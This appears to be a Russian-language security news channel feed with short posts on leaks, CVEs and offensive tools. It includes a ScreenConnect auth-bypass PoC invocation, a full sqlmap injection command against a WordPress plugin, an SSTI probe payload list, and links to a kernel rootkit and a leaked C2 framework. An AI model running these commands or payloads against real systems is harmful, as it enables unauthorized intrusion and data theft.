Все эти билайны и теле2 это только верхушка айсберга и перерастает в шпионский треш, да еще и очень быстро.
Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.
Ноги выросли отсюда I-S00N
В общем китайский APT-подрядчик нормально так накинул на вентилятор, от iOS Spyware до физических имплантируемых устройств.
В общем будет интересно, читаем вникаем дальше
*
Ну и да, кого в Китае расстреляют

UPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)


#APT

Побег из VirtualBox 7.0.10
ДЫрки в virtio-net
Почитать можно про CVE-2023-22098, CVE-2023-22099, CVE-2023-22100
*
exploit

#virtualbox #escape

ALFA LOL team
http://34.101.157.124/bins/

Ждем exploit для ScreenConnect

Linux — это теперь и CNA
Рубрика - Интересное, проект ядра Linux был принят в качестве органа нумерации CVE (CNA) для выявления уязвимостей, обнаруженных в Linux.
Теперь еще и их мониторить
Почитать тут

#vuln #linux #security

Ну понеслась

ScreenConnect POC
*
Обход аутентификации для добавления нового пользователя-администратора в ConnectWise ScreenConnect.
*
Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
*

CVE-2024-25600 wordpress Exploit (RCE)
*
Дыра в плагине Bricks Builder
*
requirements:
alive_progress
bs4
prompt_toolkit
requests
rich
*

#RCE #wordpress

ChatBot для WordPress
*
SQL-инъекция через параметр $strid в версии до 4.8.9 включительно
*
ТЫКНУТЬ
python3 sqlmap.py -u 'http://OLOLO.ru:80/wp-admin/admin-ajax.php' --data='action=wpbo_search_response&name=test&keyword=test&strid=1' --level 4 --risk 3 --dbms mysql --banner -p strid

а я споть

SSH-Snake Tool for ....lulz
*
Это идеальное сочетание лени, глупости и божьей искры )))
То есть чуваки написали утилиту на базе ssh для КАРТОГРАФИРОВАНИЯ локалки, бегает с закрытыми ключами и бед не знает.
Ну не удивительно что черные шляпы мигом взяли на вооружение 😆
Правильное название должно быть ssh-worm
ТДН во все поля )
*
SSH-Snake
*
Почитать

#worm #ssh

CVE-2024-1651 exploit (RCE)
*
Дырка в Torrentpier v2.4.1, приложение уязвимо к небезопасной десериализации, поэтому - позволяет выполнять произвольные команды на сервере.

#exploit #rce #linux

Banshee
*

Windows x64 Kernel Rootkit (Experimental)

*
Умеет:
- Kill processes
- Change protection levels
- Elevate any process token to SYSTEM
- Enumerating and erasing kernel callbacks
- Protecting the driver file
- Hide Process by PID
*
TODO list - обещает интересное расширение функционала
*
download win_rootkit

#win #rootkit

Ночью LockBit восстановил сервера, и выдал обращение

CVE-2024-21338
*
Годная статья
Lazarus и руткит FudModule: за пределами BYOVD с нулевым днем ​​от администратора до ядра
*

CVE-2024-27198
обход аутентификации с использованием уязвимости альтернативного пути в JetBrains TeamCity Server
*

#jets

Рубрика интересно
Возможна удаленная атака в стиле Stuxnet с использованием Web-Based PLC Malware: Researchers
Link

#stuxnet

Server Side Template Injection Payload List

{7*7}
*{7*7}
{{7*7}}
[[7*7]]
${7*7}
@(7*7)
<?=7*7?>
<%= 7*7 %>
${= 7*7}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]

если отдает 49 - цель уязвима

#SSTI

XieBroC2
C&C
Слили в открытый доступ все, кроме кода командного сервера.
download

#C2